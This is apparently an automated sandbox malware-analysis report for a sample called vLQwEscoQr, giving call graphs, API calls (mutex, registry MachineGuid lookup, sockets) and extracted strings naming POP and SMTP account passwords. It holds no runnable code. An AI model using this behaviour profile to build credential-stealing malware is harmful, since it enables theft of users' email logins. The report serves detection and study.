9025->9024 9029 4031e5 3 API calls 9028->9029 9030 408386 9029->9030 9030->8983 9030->8984 9032 40816f 9031->9032 9033 4081b6 9032->9033 9034 4081fd 9032->9034 9045 4081ef 9032->9045 9036 405872 4 API calls 9033->9036 9035 405872 4 API calls 9034->9035 9037 408213 9035->9037 9038 4081cf 9036->9038 9039 405872 4 API calls 9037->9039 9040 405872 4 API calls 9038->9040 9041 408222 9039->9041 9042 4081df 9040->9042 9043 405872 4 API calls 9041->9043 9044 405872 4 API calls 9042->9044 9043->9045 9044->9045 9045->8989 9047 40808c 9046->9047 9048 4080d2 9047->9048 9049 408119 9047->9049 9060 40810b 9047->9060 9050 405872 4 API calls 9048->9050 9051 405872 4 API calls 9049->9051 9052 4080eb 9050->9052 9053 40812f 9051->9053 9054 405872 4 API calls 9052->9054 9055 405872 4 API calls 9053->9055 9056 4080fb 9054->9056 9057 40813e 9055->9057 9058 405872 4 API calls 9056->9058 9059 405872 4 API calls 9057->9059 9058->9060 9059->9060 9060->8989 9067 404a19 9061->9067 9070 4049ff 9064->9070 9066 404a44 9066->8998 9068 4031e5 3 API calls 9067->9068 9069 404a2c 9068->9069 9069->8994 9071 4031e5 3 API calls 9070->9071 9072 404a12 RegCloseKey 9071->9072 9072->9066 9074 408534 9073->9074 9076 4085af 9074->9076 9083 4084ee 9074->9083 9076->9007 9078 4031e5 3 API calls 9077->9078 9079 4084c7 9078->9079 9079->9007 9081 4031e5 3 API calls 9080->9081 9082 4084e7 9081->9082 9082->9011 9084 4031e5 3 API calls 9083->9084 9085 408501 9084->9085 9085->9076 9087 4031e5 3 API calls 9086->9087 9088 408a06 9087->9088 9089 4031e5 3 API calls 9088->9089 9093 408b21 9088->9093 9092 408a32 9089->9092 9090 408b17 9121 403649 9090->9121 9092->9090 9112 403666 9092->9112 9093->9024 9096 408b0e 9118 40362f 9096->9118 9098 4031e5 3 API calls 9099 408a88 9098->9099 9099->9096 9100 4031e5 3 API calls 9099->9100 9101 408ac4 9100->9101 9102 405b6f 5 API calls 9101->9102 9103 408aff 9102->9103 9103->9096 9115 408508 9103->9115 9106 4086e2 9105->9106 9108 408744 9105->9108 9107 405872 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 9106->9107 9106->9108 9107->9106 9108->9024 9110 4031e5 3 API calls 9109->9110 9111 4036b5 9110->9111 9111->9024 9113 4031e5 3 API calls 9112->9113 9114 403679 9113->9114 9114->9096 9114->9098 9116 4031e5 3 API calls 9115->9116 9117 40851b 9116->9117 9117->9096 9119 4031e5 3 API calls 9118->9119 9120 403642 9119->9120 9120->9090 9122 4031e5 3 API calls 9121->9122 9123 40365c 9122->9123 9123->9093 8101 402c1f 8102 4031e5 3 API calls 8101->8102 8103 402c31 LoadLibraryW 8102->8103 8060 405924 8063 4031e5 8060->8063 8064 4031f3 8063->8064 8065 403236 8063->8065 8064->8065 8067 403208 8064->8067 8074 4030a5 8065->8074 8080 403263 8067->8080 8069 4031e5 3 API calls 8071 403258 8069->8071 8070 40320d 8070->8071 8072 4030a5 3 API calls 8070->8072 8073 403224 8072->8073 8073->8069 8073->8071 8086 402ca4 8074->8086 8076 4030b0 8077 4030b5 8076->8077 8090 4030c4 8076->8090 8077->8073 8081 40326d 8080->8081 8085 4032b7 8081->8085 8099 402b7c GetProcessHeap HeapAlloc 8081->8099 8083 40328c 8084 402b7c 2 API calls 8083->8084 8084->8085 8085->8070 8087 403079 8086->8087 8089 40307c 8087->8089 8094 40317b GetPEB 8087->8094 8089->8076 8091 4030eb 8090->8091 8093 4030c0 8091->8093 8096 402c03 8091->8096 8093->8073 8095 40319b 8094->8095 8095->8089 8097 4031e5 3 API calls 8096->8097 8098 402c15 8097->8098 8098->8093 8100 402b98 8099->8100 8100->8083 8104 4139de 8113 413855 8104->8113 8106 4139f1 8107 413838 GetProcessHeap HeapAlloc GetPEB 8106->8107 8110 4139f7 8107->8110 8108 413866 21 API calls 8109 413a2d 8108->8109 8111 413b81 GetProcessHeap HeapAlloc GetPEB ExitProcess 8109->8111 8110->8108 8112 413a34 8111->8112 8114 4031e5 3 API calls 8113->8114 8115 413864 8114->8115 8115->8115 8059 404df3 WSAStartup 10666 40f980 10681 413c87 10666->10681 10668 40fa19 10669 40fa08 10670 402bab 2 API calls 10669->10670 10670->10668 10671 40f993 10671->10668 10671->10669 10672 40429b 3 API calls 10671->10672 10673 40f9ca 10672->10673 10703 4060bd 10673->10703 10678 412093 6 API calls 10679 40f9f6 10678->10679 10680 412093 6 API calls 10679->10680 10680->10669 10721 413d97 10681->10721 10684 404056 5 API calls 10686 413cad 10684->10686 10685 413c9f 10685->10671 10686->10685 10687 405b6f 5 API calls 10686->10687 10689 413d10 10687->10689 10688 413d7b 10692 402bab 2 API calls 10688->10692 10689->10688 10690 403c62 3 API calls 10689->10690 10691 413d1f 10690->10691 10691->10688 10693 413d5a 10691->10693 10694 413d2c 10691->10694 10692->10685 10696 405b6f 5 API calls 10693->10696 10695 405dc5 3 API calls 10694->10695 10697 413d33 10695->10697 10698 413d55 10696->10698 10697->10698 10700 405b6f 5 API calls 10697->10700 10699 402bab 2 API calls 10698->10699 10699->10688 10701 413d48 10700->10701 10702 402bab 2 API calls 10701->10702 10702->10698 10704 4031e5 3 API calls 10703->10704 10705 4060dd 10704->10705 10706 406126 10705->10706 10707 4031e5 3 API calls 10705->10707 10706->10669 10710 40650a 10706->10710 10708 40610f 10707->10708 10784 40604f 10708->10784 10711 4060ac 3 API calls 10710->10711 10712 406519 10711->10712 10713 4031e5 3 API calls 10712->10713 10714 406529 10713->10714 10715 406599 10714->10715 10716 4031e5 3 API calls 10714->10716 10715->10678 10717 406544 10716->10717 10718 40657f 10717->10718 10720 4031e5 3 API calls 10717->10720 10719 403c40 3 API calls 10718->10719 10719->10715 10720->10718 10722 413da0 10721->10722 10725 413c96 10721->10725 10727 4065a2 10722->10727 10725->10684 10725->10685 10726 405dc5 3 API calls 10726->10725 10742 404a52 10727->10742 10729 406638 10729->10725 10729->10726 10730 4065c0 10730->10729 10754 40393f 10730->10754 10733 406631 10734 402bab 2 API calls 10733->10734 10734->10729 10735 4059d8 3 API calls 10736 4065e9 10735->10736 10738 402b7c 2 API calls 10736->10738 10741 40662a 10736->10741 10737 402bab 2 API calls 10737->10733 10739 4065f8 10738->10739 10740 402bab 2 API calls 10739->10740 10740->10741 10741->10737 10743 402b7c 2 API calls 10742->10743 10745 404a65 10743->10745 10744 404ac6 10744->10730 10745->10744 10746 4031e5 3 API calls 10745->10746 10747 404a8a RegOpenKeyExA 10746->10747 10748 404aa0 10747->10748 10749 404aca 10747->10749 10750 4031e5 3 API calls 10748->10750 10751 402bab 2 API calls 10749->10751 10752 404ab1 RegQueryValueExA 10750->10752 10751->10744 10753 404a39 4 API calls 10752->10753 10753->10744 10761 403843 10754->10761 10757 403969 10757->10733 10757->10735 10759 403961 10760 402bab 2 API calls 10759->10760 10760->10757 10762 403861 10761->10762 10763 402b7c 2 API calls 10762->10763 10765 403875 10763->10765 10764 403923 10764->10757 10780 403aef 10764->10780 10765->10764 10766 4031e5 3 API calls 10765->10766 10767 40389b 10766->10767 10767->10764 10768 4031e5 3 API calls 10767->10768 10769 4038c5 10768->10769 10770 40392a 10769->10770 10772 403666 3 API calls 10769->10772 10771 403649 3 API calls 10770->10771 10771->10764 10773 4038e7 10772->10773 10773->10770 10774 4031e5 3 API calls 10773->10774 10775 403901 10774->10775 10775->10770 10776 403911 10775->10776 10777 40362f 3 API calls 10776->10777 10778 403919 10777->10778 10779 403649 3 API calls 10778->10779 10779->10764 10781 403afc 10780->10781 10782 402b7c 2 API calls 10781->10782 10783 403b16 10782->10783 10783->10759 10785 4031e5 3 API calls 10784->10785 10786 406062 10785->10786 10786->10706

                              Control-flow Graph

                              APIs
                              • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                              • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                              • GetLastError.KERNEL32 ref: 0041399E
                              Memory Dump Source
                              • Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd
                              Yara matches
                              Similarity
                              • API ID: Error$CreateLastModeMutex
                              • String ID:
                              • API String ID: 3448925889-0
                              • Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                              • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                              • Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                              • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                • Part of subcall function 00402B7C: HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                              • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                              • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                              Memory Dump Source
                              • Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3676486918-0
                              • Opcode ID: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
                              • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                              • Opcode Fuzzy Hash: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
                              • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 82 404df3-404e16 WSAStartup
                              APIs
                              • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                              Memory Dump Source
                              • Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd
                              Yara matches
                              Similarity
                              • API ID: Startup
                              • String ID:
                              • API String ID: 724789610-0
                              • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                              • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                              • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                              • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 83 402c1f-402c37 call 4031e5 LoadLibraryW
                              APIs
                              • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                              Memory Dump Source
                              • Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                              • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                              • Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                              • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 86 413a3f-413a57 call 4031e5 ExitProcess
                              APIs
                              • ExitProcess.KERNEL32(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54
                              Memory Dump Source
                              • Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID:
                              • API String ID: 621844428-0
                              • Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                              • Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
                              • Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                              • Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 89 4049ff-404a18 call 4031e5 RegCloseKey
                              APIs
                              • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                              Memory Dump Source
                              • Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close
                              • String ID:
                              • API String ID: 3535843008-0
                              • Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                              • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                              • Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                              • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                              APIs
                              • CoInitialize.OLE32(00000000), ref: 0040438F
                              • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                              • VariantInit.OLEAUT32(?), ref: 004043C4
                              • SysAllocString.OLEAUT32(?), ref: 004043CD
                              • VariantInit.OLEAUT32(?), ref: 00404414
                              • SysAllocString.OLEAUT32(?), ref: 00404419
                              • VariantInit.OLEAUT32(?), ref: 00404431
                              Memory Dump Source
                              • Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd
                              Yara matches
                              Similarity
                              • API ID: InitVariant$AllocString$CreateInitializeInstance
                              • String ID:
                              • API String ID: 1312198159-0
                              • Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                              • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                              • Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                              • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                              • API String ID: 0-2111798378
                              • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                              • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                              • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                              • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                              • HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                              Memory Dump Source
                              • Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                              • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                              • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                              • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                              APIs
                              • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                              Memory Dump Source
                              • Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd
                              Yara matches
                              Similarity
                              • API ID: recv
                              • String ID:
                              • API String ID: 1507349165-0
                              • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                              • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                              • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                              • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                              Memory Dump Source
                              • Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                              • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                              • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                              • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd
                              Yara matches
                              Similarity
                              • API ID: _wmemset$ErrorLast
                              • String ID: IDA$IDA
                              • API String ID: 887189805-2020647798
                              • Opcode ID: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
                              • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                              • Opcode Fuzzy Hash: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
                              • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                              APIs
                              • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                              • socket.WS2_32(?,?,?), ref: 00404E7A
                              • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                              Memory Dump Source
                              • Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd
                              Yara matches
                              Similarity
                              • API ID: freeaddrinfogetaddrinfosocket
                              • String ID:
                              • API String ID: 2479546573-0
                              • Opcode ID: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
                              • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                              • Opcode Fuzzy Hash: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
                              • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98